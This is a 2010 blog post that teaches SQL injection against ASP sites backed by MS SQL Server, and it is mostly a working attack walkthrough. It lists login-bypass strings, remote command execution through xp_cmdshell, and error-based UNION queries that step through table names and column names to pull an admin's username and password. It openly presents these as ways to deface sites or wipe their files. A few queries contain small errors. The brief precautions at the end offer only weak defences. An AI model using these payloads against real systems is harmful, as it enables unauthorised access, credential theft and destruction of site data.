Wednesday, September 15, 2010

My SQL injection article [Covers Very Basic Examples]


SQL Injection is one of the best effective and most dangerous attacks to the Web Applications. Its implementation is very fast and reliable also. So many times [Condition - If server is vulnerable] then one newbie also can mess-up and play with his web server. This is a very simple method because the attacker implements these attacks to any web server very fast. And once he will get any information from SQL Injection point of view then he/she can easily play with his site e.g. he/she can deface his site by ftp server of the victims or can modify his/her website and so on. Finally my view on SQL Injection is this is an aid to the Web Hacker's as they don't have to labor hard for this attack vector.

-= A little description abt this Injection =-

This attack vector is one type of web app hacking that requires nothing but only wants only port 80 open. It attacks on the web apps i.e. [ ASP, JSP, PHP, CGI ] and many more themselves rather than on the web server or services running in the OS.

This attack is a nice technique to inject SQL Commands or queries by the help of any Web Browsers. I am giving priority on browser most becuase many web pages takes parameters from users and it makes SQL queries to the database. I will discuss the mechanisms on this attack vector becuase I think most web hackers know all what I wrote above. So I will discuss few methods and mechanisms of this injection now.

-= Let's start the Game in the Web Playground =-

When doing any SQL Injection attack always think of these things. Always google for pages like asp/php/cgi becuase these pages obviously uses the "POST" Method to feed the contents to the web server. But these pages should be related to something like this "login pages or search pages or may be feedbacks pages". But remember that always check the Source Code for the web pages becuase sometimes from the source pages u get some good informations. As they have potential parameters that might be useful sometimes. Let me give u a very common example -




Note: But what will happen when someone will not get any login page or any POST Method using page ? At that time his duty is to find the parameters like
Code:
http://website/index.asp?ID=10
.

Let's start the Attack.
Let's take an example of this parameter: Hacker' or x=x--

I mean to say that use this in that page :

Login : Hacker' or x=x--
Pass : Hacker' or x=x--
OR U may use this in another way which is written below :
Code:
http://website/index.asp?ID=Hacker
' or x=x--
Then obviously press the Enter Key. Then if the Admin is not taking care of his web app security then the attacker will easily enter into his admin or any important login page very easily and fast.

But now a question arises that why ' or x=x-- Huh
Solution :
Let us look at another example why ' or x=x-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL:
Code:
http://website/index.asp?category=info


In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that I have created for this.

v_cat = request("category")
sqlstr="SELECT * FROM tablename WHERE XCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)

As u can see my variable will be wrapped into v_cat and thus the SQL statement should become:

SELECT * FROM tablename WHERE XCategory='info'

The query now will return a result set containing one or more rows that match the WHERE condition, in this case, 'info'.

Now assume that I will change the URL into something like:
Code:
http://website/index.asp?category=info
' or x=x--

Now my variable v_cat equals to "info' or x=x-- ", if I will substitute this in the SQL query then I will have:

SELECT * FROM tablename WHERE XCategory='info' or x=x--'

The query now should now select everything from the product table regardless if XCategory is equal to 'info' or not. A "--" tells SQL server to ignore the rest of the query, which will get rid of the last hanging single quote ('). But sometimes instead of [--] # is also used but this is rare.

If it is not an SQL server then you simply cannot ignore the rest of the query, you can use this injection method also :

' or 'x'='x

As a result now my query will be like this :

SELECT * FROM tablename WHERE XCategory='info' or 'x'='x'

And it will also give u the same output.

To my experience you can also use some of my favorite injection strings, which are written below :

' or x=x--
'' or x=x--
or x=x--
' or 'x'='x
'' or ''x''=''x
') or ('x'='x

And many more. U can also make some of yr own dangerous injection strings to get into the site.

Remote Xecution.

Now I will tell u something about the SQL Injection stored procedures which are used to administer access in Windows.So u can use a cool stored procedure like master ...xp_cmdshell.

Example of this stored procedure :

'; exec master ..xp_cmdshell 'ping xxx.xxx.xx.xx'--

If u r not able to get success then u should just try double quotes [''] instead of single quotes ['].

Why ; is used ?

this is used becuase it ends the current sql query and allows to start a new sql command. If u want that is the command successfully executed or not then u may try this cool & simple trick and u can thus able to listen ICMP Packet from xxx.xxx.xx.xx.

So u have to type this in yr shell box :

root#tcpdump icmp

If u will not get any ping request from the server u have attacked then u think that the web admin is quite clever and the admin had restricted access for a certain limited users for using this stored procedures.

-= Output of Yr inserted Queries of MySQL. =-

Attackers generally use this trick to use write queries in any HTML Page.

However the syntax is ': exec master ..sp_makewebtask "\10.10.1.3docsmain.html","select * from INFORMATION_SCHEMA.TABLES"...

But the main thing we have to see that the victim should have the directory as "docs" and this folder should be shared for all users.

-= Error Messages [Really A Boon for the Web Attackers but How?] =-

Really sometimes if the web application is vulnerable then it displays some venerable information's [In a way of Error Msgs] and thus the Attacker utilizes the error in a proper manner.

Now I am discussing the method below :

Suppose u r in a page such as "
Code:
http://website/index.asp?ID=10
".

Now let's start the Real Game...

Just simply modify the URL in such a manner which is mentioned below :
Code:
http://website/index.asp?ID=10
union select top 1 tablename from INFORMATION_SCHEMA.TABLES--

Now obviously a doubt will definitely arise in yr mind that "What the INFORMATION_SCHEMA,TABLES" is???

Ans : This is such a table which holds all the info of yr table names in yr favorite web server.

Dangerous Syntax : select top 1 tablename INFORMATION_SCHEMA.TABLES--

What the objective of this syntax is???

Ans : This cool syntax will give u the 1st table name from yr DB[DataBase].And when I am unionizing the string value to an Integet DataType 10 then our server [Here MS SQL] will try to make a conversion [From string value(known as 'nvarchar') to an integer]. And as a result it will obviously generate an error message becuase the concept for this is 'nvarchar can't convert into integet datatype.' As a result the server will be a bit confused and will produce an error message which is written below :

MS OLE DB Provider for ODBC Drivers error 'error number'
[MS][ODBC SQL Server Driver][SQL Query]syntax error converting the nvarchar value 'data' to a column of data type int. /index.asp,line 3.

Wow cool we got a really useful error message. Now let's see how I am getting deeper with the help of this error message...

Now just this how u will get the next table name from any query..So here is the solution.
Code:
http://website/index.asp?ID=10
Union top 1 table_name from INFORMATION_SCHEMA.TABLES Where table_name not in ('data')--

Output of this nice query :

MS OLE DB Provider for ODBC Drivers error 'error number'
[MS][ODBC SQL Server Driver][SQL Query]syntax error converting the nvarchar value 'adm_log' to a column of data type int. /index.asp,line 3.

Another Nice Syntax :-

I can also use another useful syntax INFORMATION_SCHEMA.COLUMNS for mapping out the column names of a table.

So my query will be now :
Code:
http://website/index.asp?ID=10
Union select top 1 column_name from INFORMATION_SCHEMA.COLUMNS WHERE table_name='adm_log'--

And its out will be as follows:

MS OLE DB Provider for ODBC Drivers error 'error number'
[MS][ODBC SQL Server Driver][SQL Query]syntax error converting the nvarchar value 'lg_id' to a column of data type int. /index.asp,line 3.

So now I have the first column name and now I will use the NOT IN() query string to get the next column name.
Code:
http://website/index.asp?ID=10
Union select top 1 column_name from INFORMATION_SCHEMA.COLUMNS WHERE table_name='adm_log' where column_name not in ('lg_id')--

I will get the following output then.

MS OLE DB Provider for ODBC Drivers error 'error number'
[MS][ODBC SQL Server Driver][SQL Query]syntax error converting the nvarchar value 'lg_name' to a column of data type int. /index.asp,line 3.

Now I got a lot of things and these are sufficient to get into the site [ If luck will be with me ]. So now I will finally make another query which will give me the pass of the admin of the vulnerable site.

So let's finalize and have fun

Use this syntax to get the admin's username:
Code:
http://website/index.asp?ID=10
union select top 1 lg_name from adm_log--

And now this will display the following error msg.

MS OLE DB Provider for ODBC Drivers error 'error number'
[MS][ODBC SQL Server Driver][SQL Query]syntax error converting the nvarchar value 'vulnadmin' to a column of data type int. /index.asp,line 3.

Now from this error message I came to know that the admin name for the vulnerable site is 'vulnuser' [no quotes]. So now this is the right time to get the password of 'vulnadmin' with this simple query.
Code:
http://website/index.asp?ID=10
union select top 1 password from adm_log where lg_name='vulnadmin'--

Now I will get a nice error msg which will show the password of the admins. The output is as follows :

MS OLE DB Provider for ODBC Drivers error 'error number'
[MS][ODBC SQL Server Driver][SQL Query]syntax error converting the nvarchar value 'c00lp4ss' to a column of data type int. /index.asp,line 3.

From the above error message it is clearly mentioned that the password for 'vulnadmin' is 'c00lp4ss'. And once someone will have the admin pass then the attacker can mess up or deface his site easily or the attacker may login to his ftp server and may delete all the files from the web server.

-= Precautions from SQL Injection Attack Vector =-

-> Always filter various input chars like ' or '' or \ or ; or extended characters like NULL.
-> For numeric values convert it into an integer b4 parsing it into the SQL statement.
-> Always delete stored procedures which are never useful anymore like master ..Xp_cmdshell, xp_startmail, xp_makewebtask and xp_sendmail. 

....................................................................................................................................................................................................................
....................................................................................................................................................................................................................
....................................................................................................................................................................................................................
....................................................................................................................................................................................................................  

0 comments:

Post a Comment